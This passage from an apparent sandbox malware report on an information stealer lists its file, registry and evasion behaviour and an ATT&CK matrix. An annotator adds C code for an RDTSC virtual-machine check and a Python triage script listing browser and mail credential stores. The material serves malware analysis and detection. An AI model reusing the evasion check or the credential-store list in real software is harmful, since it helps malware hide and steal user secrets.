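 * visible in the report, so this counter is an assumption. */
int tsc_outliers(int n, uint64_t threshold) {
    int hits = 0;
    for (int i = 0; i < n; i++)
        if (tsc_delta_once() > threshold) hits++;
    return hits;
}

/* Decision rule kept as a pure function of the measurements so it is testable:
 * flag the host if every pair is slow, or if more than half the pairs are. */
int looks_instrumented(uint64_t min_delta, int outliers, int n, uint64_t threshold) {
    return min_delta > threshold || outliers * 2 > n;
}

int main(void) {
    uint64_t m = tsc_delta_min(RDTSC_SAMPLES);
    int o = tsc_outliers(RDTSC_SAMPLES, RDTSC_VM_THRESHOLD);
    printf("min delta=%llu outliers=%d/%d -> %s\n",
           (unsigned long long)m, o, RDTSC_SAMPLES,
           looks_instrumented(m, o, RDTSC_SAMPLES, RDTSC_VM_THRESHOLD)
               ? "instrumented" : "clean");
    return 0;
}
```

The "RDTSC instruction interceptor" rows above mean the sandbox intercepted the instruction rather than letting it execute natively; a sample that runs this kind of loop is comparing the observed deltas against a built-in limit and bailing out when the host looks too slow, which is why the report also flags the long sleeps and the low API coverage below.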
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Memory allocated: 3550000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Memory allocated: 33C70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Memory allocated: 35C70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp3EED.tmp\System.dll
Source: C:\Users\user\Desktop\rDatosbancarios.exe | API coverage: 1.7 %
Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 5608 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 5608 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 10_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_0040596F
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 10_2_004064C1 FindFirstFileW,FindClose,10_2_004064C1
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 10_2_004027FB FindFirstFileW,10_2_004027FB
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.0000000003748000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3043622105.00000000037AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\rDatosbancarios.exe | API call chain: ExitProcess graph end node (graph_0-4496)
Source: C:\Users\user\Desktop\rDatosbancarios.exe | API call chain: ExitProcess graph end node (graph_0-4503)
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Process created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Queries volume information: C:\Users\user\Desktop\rDatosbancarios.exe VolumeInformation
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A0
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rDatosbancarios.exe PID: 664, type: MEMORYSTR
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 0000000A.00000002.3065111248.0000000033D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rDatosbancarios.exe PID: 664, type: MEMORYSTR
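Added example, mine rather than part of the report or of Joe Sandbox's tooling: a small parser that turns behaviour rows like the ones above into records and flags the rows that touch credential stores. It expects the run-together layout this text extraction produces (the origin cell and the event cell are concatenated, and a "Jump to behavior" / "Jump to dropped file" link text trails the value), strips the link text, and classifies the event by a hand-picked keyword list. The credential-store path list is also a hand-picked assumption; the sample lines are copied from this report. Browser History and Web Data are deliberately not in the list, since those are browsing data rather than secrets.

```python
"""Added example (not part of the Joe Sandbox report): triage behaviour rows.

Assumptions (mine, not the report's): rows look like
    Source: <origin><Event>: <value>[Jump to behavior|Jump to dropped file]
and EVENTS / CREDENTIAL_STORES are illustrative lists, not Joe Sandbox's own.
"""
import re
from collections import Counter

# Event keywords used in this report's rows (hand-picked; extend as needed).
EVENTS = (
    "Code function", "File created", "File opened", "File read", "File written",
    "Key opened", "Key value queried", "Mutant created", "Section loaded",
    "Process created", "Thread delayed", "Memory allocated",
    "Dropped PE file which has not been started", "Binary or memory string",
)
_EVENT_RE = re.compile(
    r"^Source: (?P<origin>.*?)(?P<event>"
    + "|".join(re.escape(e) for e in EVENTS)
    + r"): ?(?P<value>.*)$"
)
_LINK_RE = re.compile(r"(Jump to behavior|Jump to dropped file)$")

# Paths and registry keys that hold stored credentials. A process that is
# neither the browser nor the mail client has no business opening these.
# (Assumption: hand-picked subset for this example.)
CREDENTIAL_STORES = (
    r"\Google\Chrome\User Data\Default\Login Data",
    r"\Google\Chrome\User Data\Default\Network\Cookies",
    r"\Microsoft\Edge\User Data\Default\Login Data",
    r"\Windows Messaging Subsystem\Profiles\Outlook",
    r"\Software\Microsoft\Office\15.0\Outlook\Profiles",
    r"\PostboxApp\Profiles",
)

# Constructed sample: rows copied verbatim from the report above.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\rDatosbancarios.exeFile created: C:\Users\user\AppData\Local\Temp\nst3D83.tmpJump to behavior
Source: C:\Users\user\Desktop\rDatosbancarios.exeMutant created: NULL
Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\rDatosbancarios.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: rDatosbancarios.exeVirustotal: Detection: 45%
Source: C:\Users\user\Desktop\rDatosbancarios.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp3EED.tmp\System.dllJump to dropped file
"""


def parse_line(line):
    """Return {'origin', 'event', 'value'} for a behaviour row, else None."""
    line = _LINK_RE.sub("", line.strip())      # drop the trailing link text
    m = _EVENT_RE.match(line)
    if not m:
        return None                             # e.g. AV verdict rows
    return {"origin": m["origin"], "event": m["event"], "value": m["value"]}


def parse_report(text):
    """Parse every row in a block of report text, skipping non-behaviour rows."""
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def credential_store_accesses(records):
    """Rows whose File opened / Key opened target is a known credential store."""
    hits = []
    for r in records:
        if r["event"] in ("File opened", "Key opened") and any(
                s.lower() in r["value"].lower() for s in CREDENTIAL_STORES):
            hits.append(r)
    return hits


def summarize(records):
    """Event-type histogram, a quick view of what the sample spent its time on."""
    return Counter(r["event"] for r in records)


if __name__ == "__main__":
    recs = parse_report(SAMPLE_LINES)
    for ev, n in summarize(recs).most_common():
        print(f"{n:3d}  {ev}")
    for r in credential_store_accesses(recs):
        print("credential store:", r["event"], r["value"])
```

Run against the full row list of a report, the credential-store hits are the rows worth copying into a detection rule: a user-profile executable (here C:\Users\user\Desktop\rDatosbancarios.exe) opening Chrome's Login Data, Edge's Login Data and the Outlook profile key in one run is the access pattern the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures describe.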

Remote Access Functionality

Source: Yara match | File source: 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rDatosbancarios.exe PID: 664, type: MEMORYSTR
MITRE ATT&CK matrix (one line per tactic; the number in parentheses is the per-technique count as printed in the report, and entries without a number are matrix placeholders with no matching signature):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Access Token Manipulation (1); Process Injection (11); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (21); Virtualization/Sandbox Evasion (31); System Network Configuration Discovery (1); File and Directory Discovery (4); System Information Discovery (215); Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Web Service (1); Encrypted Channel (21); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement